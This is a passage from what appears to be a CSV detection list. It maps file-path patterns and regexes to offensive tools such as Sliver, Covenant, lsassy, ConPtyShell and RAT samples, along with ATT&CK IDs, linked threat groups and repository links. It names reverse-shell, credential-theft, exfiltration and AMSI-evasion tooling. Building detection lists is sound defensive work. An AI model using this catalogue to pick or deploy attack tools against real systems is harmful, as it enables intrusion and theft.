"*/command/exec/sideload.go*",".{0,1000}\/command\/exec\/sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6166" "*/command/exec/spawndll.go*",".{0,1000}\/command\/exec\/spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6167" "*/command_exec.exe*",".{0,1000}\/command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6168" "*/commandcontrol/malware*.py*",".{0,1000}\/commandcontrol\/malware.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6169" 
"*/commander-runme*",".{0,1000}\/commander\-runme.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6170" "*/commando-vm*",".{0,1000}\/commando\-vm.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","6171" "*/commix.git",".{0,1000}\/commix\.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","6172" "*/commix.py*",".{0,1000}\/commix\.py.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","6173" "*/common/beacon.go*",".{0,1000}\/common\/beacon\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","6174" "*/COM-Object-hijacking.git*",".{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","6175" "*/completions/exegol.fish*",".{0,1000}\/completions\/exegol\.fish.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6176" "*/comsvcs_stealth.py*",".{0,1000}\/comsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6177" "*/ComunicationC2.cpp*",".{0,1000}\/ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6178" "*/CONCRETE_STEEL.exe""*",".{0,1000}\/CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6179" "*/conf/c2profiles.json*",".{0,1000}\/conf\/c2profiles\.json.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6180" "*/config/doNmapScanWin.bat *",".{0,1000}\/config\/doNmapScanWin\.bat\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6182" "*/configdhcpserver.sh*",".{0,1000}\/configdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","6183" 
"*/Configure-Victim.ps1*",".{0,1000}\/Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6184" "*/ConfuserEx.exe*",".{0,1000}\/ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6185" "*/ConfuserEx.git*",".{0,1000}\/ConfuserEx\.git.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6186" "*/confuserex.py*",".{0,1000}\/confuserex\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","6187" "*/ConfuserEx_bin.zip*",".{0,1000}\/ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6188" 
"*/ConPtyShell/*",".{0,1000}\/ConPtyShell\/.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","6191" "*/ContainYourself.git*",".{0,1000}\/ContainYourself\.git.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","6192" "*/ConvertToShellcode.py*",".{0,1000}\/ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","6193" "*/CookieProcessor.cs*",".{0,1000}\/CookieProcessor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","6194" "*/Coolvibes.exe*",".{0,1000}\/Coolvibes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6195" "*/Cooolis-ms/*",".{0,1000}\/Cooolis\-ms\/.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","6196" "*/Cordyceps.git*",".{0,1000}\/Cordyceps\.git.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","3","N/A","N/A","N/A","N/A","6197" "*/core/browser_darwin.go*",".{0,1000}\/core\/browser_darwin\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","#linux","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6198" "*/core/browser_linux.go*",".{0,1000}\/core\/browser_linux\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 
- APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","#linux","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6199" "*/core/browser_windows.go*",".{0,1000}\/core\/browser_windows\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6200" "*/Coringa-RAT 0.1.exe*",".{0,1000}\/Coringa\-RAT\s0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6201" "*/CORINGA-RAT.exe*",".{0,1000}\/CORINGA\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6202" "*/Corrupt_AMSI.py*",".{0,1000}\/Corrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6203" "*/Corrupt_AMSI.vba*",".{0,1000}\/Corrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6204" "*/couchdb-databases.nse*",".{0,1000}\/couchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6205" "*/couchdb-stats.nse*",".{0,1000}\/couchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6206" "*/Covenant*.cs*",".{0,1000}\/Covenant.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6207" "*/Covenant.git*",".{0,1000}\/Covenant\.git.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6208" "*/Covenant/*",".{0,1000}\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6209" "*/CovenantUsers/*",".{0,1000}\/CovenantUsers\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6210" "*/CppWSManWinRM.exe*",".{0,1000}\/CppWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","6211" "*/crack.sh/get-cracking/*",".{0,1000}\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","crack.sh","crack.sh THE WORLD'S FASTEST DES CRACKER.
Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6212" "*/crack_list/client_wordlists.py*",".{0,1000}\/crack_list\/client_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6213" "*/crack_list/cracklist_api.py*",".{0,1000}\/crack_list\/cracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6214" "*/crack_list/dictionary.py*",".{0,1000}\/crack_list\/dictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6215" "*/crack_list/wordlist.py*",".{0,1000}\/crack_list\/wordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6216" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
